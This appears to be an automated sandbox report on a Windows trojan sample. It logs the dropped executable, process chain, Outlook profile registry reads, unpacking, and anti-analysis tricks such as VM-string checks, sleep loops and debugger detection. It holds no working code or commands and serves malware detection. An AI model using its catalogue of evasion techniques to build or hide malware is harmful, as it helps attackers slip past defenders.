Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe ReversingLabs: Detection: 42%
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Virustotal: Detection: 42%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Jump to behavior
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe File created: C:\Users\user\AppData\Local\Temp\nsjF9DB.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/5@12/10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Unpacked PE file: 3.2.vfpbkeeo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00410A64 push ecx; ret 1_2_00410A77
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040A846 push cs; retf 3_2_0040A847
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00411320 push ds; retf 3_2_00411322
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040DC2C pushfd ; iretd 3_2_0040DC3A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040B4FA push ecx; ret 3_2_0040B501
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040AD0D push 255F11F9h; retf 3_2_0040AD18
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041B674 pushad ; retf 3_2_0041B678
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00401E20 push eax; ret 3_2_00401E22
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009FD0D1 push ecx; ret 3_2_009FD0E4
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe File created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\cmd.exe TID: 5936 Thread sleep time: -48000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D6A60 rdtscp 3_2_009D6A60
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 889 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 862 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A407DA GetSystemInfo, 1_2_00A407DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_004089B8 FindFirstFileExW, 1_2_004089B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60201-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000004.00000003.449986076.000000000858E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c9
Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000004.00000000.327263504.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.574282998.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SPS
Source: explorer.exe, 00000004.00000002.576863468.000000000CDEA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000004.00000003.565329897.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.577506261.000000000D009000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: explorer.exe, 00000004.00000003.451089971.000000000CFB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.447484524.000000000CFB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401754
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_0040B06F GetProcessHeap, 1_2_0040B06F
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D6A60 rdtscp 3_2_009D6A60
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A4005F mov eax, dword ptr fs:[00000030h] 1_2_00A4005F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A4013E mov eax, dword ptr fs:[00000030h] 1_2_00A4013E
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A40109 mov eax, dword ptr fs:[00000030h] 1_2_00A40109
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A4017B mov eax, dword ptr fs:[00000030h] 1_2_00A4017B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9080 mov eax, dword ptr fs:[00000030h] 3_2_009A9080
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DF0BF mov ecx, dword ptr fs:[00000030h] 3_2_009DF0BF
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DF0BF mov eax, dword ptr fs:[00000030h] 3_2_009DF0BF
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DF0BF mov eax, dword ptr fs:[00000030h] 3_2_009DF0BF
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A23884 mov eax, dword ptr fs:[00000030h] 3_2_00A23884
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A23884 mov eax, dword ptr fs:[00000030h] 3_2_00A23884
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E90AF mov eax, dword ptr fs:[00000030h] 3_2_009E90AF
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h] 3_2_009BB02A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h] 3_2_009BB02A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h] 3_2_009BB02A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h] 3_2_009BB02A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A74015 mov eax, dword ptr fs:[00000030h] 3_2_00A74015
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A74015 mov eax, dword ptr fs:[00000030h] 3_2_00A74015
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h] 3_2_00A27016
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h] 3_2_00A27016
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h] 3_2_00A27016
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C0050 mov eax, dword ptr fs:[00000030h] 3_2_009C0050
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C0050 mov eax, dword ptr fs:[00000030h] 3_2_009C0050
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A71074 mov eax, dword ptr fs:[00000030h] 3_2_00A71074
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A62073 mov eax, dword ptr fs:[00000030h] 3_2_00A62073
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DA185 mov eax, dword ptr fs:[00000030h] 3_2_009DA185
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CC182 mov eax, dword ptr fs:[00000030h] 3_2_009CC182
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009AB1E1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009AB1E1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009AB1E1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h] 3_2_009A9100
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h] 3_2_009A9100
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h] 3_2_009A9100
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D513A mov eax, dword ptr fs:[00000030h] 3_2_009D513A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D513A mov eax, dword ptr fs:[00000030h] 3_2_009D513A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov ecx, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CB944 mov eax, dword ptr fs:[00000030h] 3_2_009CB944
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CB944 mov eax, dword ptr fs:[00000030h] 3_2_009CB944
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB171 mov eax, dword ptr fs:[00000030h] 3_2_009AB171
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB171 mov eax, dword ptr fs:[00000030h] 3_2_009AB171
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DD294 mov eax, dword ptr fs:[00000030h] 3_2_009DD294
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DD294 mov eax, dword ptr fs:[00000030h] 3_2_009DD294
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BAAB0 mov eax, dword ptr fs:[00000030h] 3_2_009BAAB0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BAAB0 mov eax, dword ptr fs:[00000030h] 3_2_009BAAB0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DFAB0 mov eax, dword ptr fs:[00000030h] 3_2_009DFAB0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C3A1C mov eax, dword ptr fs:[00000030h] 3_2_009C3A1C
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5B260 mov eax, dword ptr fs:[00000030h] 3_2_00A5B260
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5B260 mov eax, dword ptr fs:[00000030h] 3_2_00A5B260
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78A62 mov eax, dword ptr fs:[00000030h] 3_2_00A78A62
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h] 3_2_009A9240
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h] 3_2_009A9240
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h] 3_2_009A9240
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h] 3_2_009A9240
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E927A mov eax, dword ptr fs:[00000030h] 3_2_009E927A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A75BA5 mov eax, dword ptr fs:[00000030h] 3_2_00A75BA5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DB390 mov eax, dword ptr fs:[00000030h] 3_2_009DB390
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h] 3_2_009B1B8F
